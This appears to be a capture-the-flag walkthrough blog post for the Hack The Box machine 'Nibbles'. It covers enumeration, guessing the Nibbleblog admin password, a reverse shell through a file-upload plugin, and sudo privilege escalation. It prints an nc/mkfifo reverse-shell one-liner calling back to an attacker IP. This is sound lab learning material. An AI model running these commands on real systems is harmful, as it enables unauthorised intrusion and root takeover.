Hi, in this post I will explain how to solve Nibbles in Hack the box.
We are requested to get the user flag and the root flag.
In order to find out the flags, we need to scan a target machine first.
One of good ways to start investigation on the target machine, is to nmap it.
Enumeration
So, let’s do nmap on the target IP.
nmap -sC -sV 10.129.178.196Then I get the result that the ports 22 and 80 are open.
Since port 80 is open, let’s see how the website looks like.
Ok, not much information.
How about source code?
There is a comment and it is inviting us to /nibbleblog/👻
Let’s check the /nibbleblog/ page to find out more useful information.
It is a main page of the blog. Nibbles Yum yum.
I’ve looked around the blog, but I couldn’t find any useful information.
It’s time to use another useful tool. gobuster.
I run gobuster to find related directories of the blog.
gobuster dir -u http://10.129.178.196/nibbleblog -w /usr/share/wordlists/dirb/common.txt Then I could see some interesting results such as
admin, admin.php, content, languages, README.
For example, if I check /README then I could know the version of Nibbleblog.
It would be useful to find any exploits with the version.
Another hint from the directories is that we can find an username for login.
It looks the default username is being used.
So the another piece for login is password. However, I couldn’t find any exposures of it.
Let’s go to /admin.php page which is revealed by gobuster, and try guessing passwords to log in.
Since the username is the default username, I tried some passwords that feel like defaults.
admin, password, admin1234 …
All failed. So I inserted random words caught in my eyes.
When I tried nibbles, I could log in. I think it was clever to use Cewl in this case. Because Cewl gives me a list of words related or appeared in the website.
Reverse shell
Ok, I managed to log in as admin.
As a next step, I want to access to terminal in order to find out the flags. Our initial mission.
Since it is a blog, maybe there are some places that we can upload scripts or files.
And yes, we can upload files from My image one of plugins.
Then, we need a script file which will help us to connect to the target machine using reverse shell.
I made a file having script for connection to my machine.
After upload the file on the blog, it can be checked that it is uploaded in content directory.
Listening the port with netcat, and click the uploaded file.
Then we can see the connection is made and we sneaked in as nibbler.
The user.txt flag can be found from the home directory of the user.
Privilege escalation
cleared one mission out of two.
Let’s continue to find out the root flag.
nibbler has limited privileges, so it is not possible to see the root flag directly.
Need to get the root privilege.
We can start with sudo -l command. It will tell us if there are any directories that we can use as sudo.
And there it is. We found root privilege in /home/nibbler/personal/stuff/monitor.sh
It doesn’t even ask for password. sweet.
Let’s check the monitor.sh file whether we can use it or not.
If we look into the file, we can know this file is for monitoring. (as the file name represents)
We can add one line at the end of the file to make connection using reverse shell again.
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.16 8443 >/tmp/f' | tee -a monitor.shThis time, on port 8443 the reverse shell will be connected.
Let’s listen the port 8443 on our machine, and then trigger the reverse shell by executing the monitor.sh file with the root privilege which is sudo.
sudo /home/nibbler/personal/stuff/monitor.sh
Boom, we became root!
And now we can access to /root directory and see the root.txt file.
Yay! mission completed🎉
